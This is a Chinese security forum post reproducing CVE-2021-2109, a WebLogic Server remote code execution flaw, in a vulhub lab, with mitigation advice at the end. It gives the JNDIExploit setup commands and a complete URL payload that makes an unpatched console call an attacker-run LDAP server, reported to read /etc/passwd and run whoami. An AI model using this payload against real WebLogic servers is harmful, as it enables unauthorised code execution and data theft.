安全矩阵

 找回密码
 立即注册
搜索
查看: 2412|回复: 0

Weblogic Server远程代码执行漏洞复现(CVE-2021-2109)

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2021-3-18 22:14:45 | 显示全部楼层 |阅读模式
原文链接:Weblogic Server远程代码执行漏洞复现(CVE-2021-2109)

0x00 前言


模板太占用空间,以后写文章不用模板了,直接上内容。这次的漏洞复现比较简单,细节不再赘述。

0x01影响版本

WebLogic 10.3.6.0.0
WebLogic 12.1.3.0.0
WebLogic 12.2.1.3.0
WebLogic 12.2.1.4.0
WebLogic 14.1.1.0.0

0x02 环境搭建

漏洞环境可以直接用vulnhub里现成的。
  1. git clone https://github.com/vulhub/vulhub.git
  2. cd vulhub/weblogic/CVE-2020-14882
  3. sudo docker-compose up -d
复制代码



访问 http://xxx.xxx.xxx.xxx:7001


0x03漏洞利用
访问http://xxx.xxx.xxx.xxx:7001/cons ... /consolejndi.portal
如果此页面未授权可访问,而且weblogic是受影响的版本,那么此处有可能存在漏洞。


之后需要启动LDAP
  1. https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11 #下载地址
  2. unzip JNDIExploit.v1.11.zip
  3. java -jar JNDIExploit.v1.11.jar -i xxx.xxx.xxx.xxx #启动
复制代码




然后我们可以用burp进行抓包,抓包的时候注意下8080端口可能被占用,我们在系统代理设置里随便改个数就行,比如8081。
我们所用到payload:
  1. /console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://xxx.xxx.xxx;xxx:1389/Basic/WeblogicEcho;AdminServer%22)
复制代码

把xxx.xxx.xxx;xxx:1389改成自己的地址就可以,千万注意,第三个分隔符是分号。

我们用这段payload对数据包进行修改,并加上自己要执行的命令,如下:

成功显示/etc/passwd的内容


成功执行whoami


0x04 安全建议

1、禁用T3协议
如果您不依赖T3协议进行JVM通信,可通过暂时阻断T3协议缓解此漏洞带来的影响
1). 进入Weblogic控制台,在base_domain配置页面中,进入“安全”选项卡页面,点击“筛选器”,配置筛选器。
2). 在连接筛选器中输入:weblogic.security.net.ConnectionFilterImpl,在连接筛选器规则框中输入:* * 7001 deny t3 t3s。

2、禁止启用IIOP
登陆Weblogic控制台,找到启用IIOP选项,取消勾选,重启生效

3、临时关闭后台/console/console.portal对外访问

4、升级官方安全补丁












回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 21:47 , Processed in 0.012424 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表